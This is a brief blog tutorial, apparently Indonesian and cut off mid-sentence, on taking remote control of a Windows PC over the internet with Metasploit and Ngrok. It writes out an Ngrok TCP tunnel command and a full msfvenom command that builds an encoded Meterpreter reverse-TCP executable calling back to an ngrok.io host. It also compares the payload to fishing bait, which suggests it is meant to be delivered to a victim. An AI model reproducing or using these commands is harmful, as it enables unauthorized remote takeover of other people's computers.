Postingan

ReShare Remote Exploit PC On WAN ( with Ngrok )

Gambar
Fire Up Okay today i wanna share a tutorial from keingintahuan-id TOOLS: 1. INSTALL Metasploit ( Attacker ) Metasploit is very powerfull tools, you know what ? in this tool have thousand exploit and payload for exploiting any sistem #wow, not for scannig to, in msf you can do scanning , enumerate, sniffing etc, its so usefull right ? haha  DOWNLOAD  + INSTALL 2. TARGET for target if you have'nt target for your practical, you can download and Install  VMWARE  + Download ISO image for Windows targeted (Not one Network / IP public ).       3. Ngrok HOW to Install NGROK Ok Here we Go !!   1. run Ngrok ( TCP ) $  ngrok tcp 4444   2.  We must make the payload with MSFvenom Payload Use for feed in fishing order fish bit the feed.     $  sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11029 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe yo...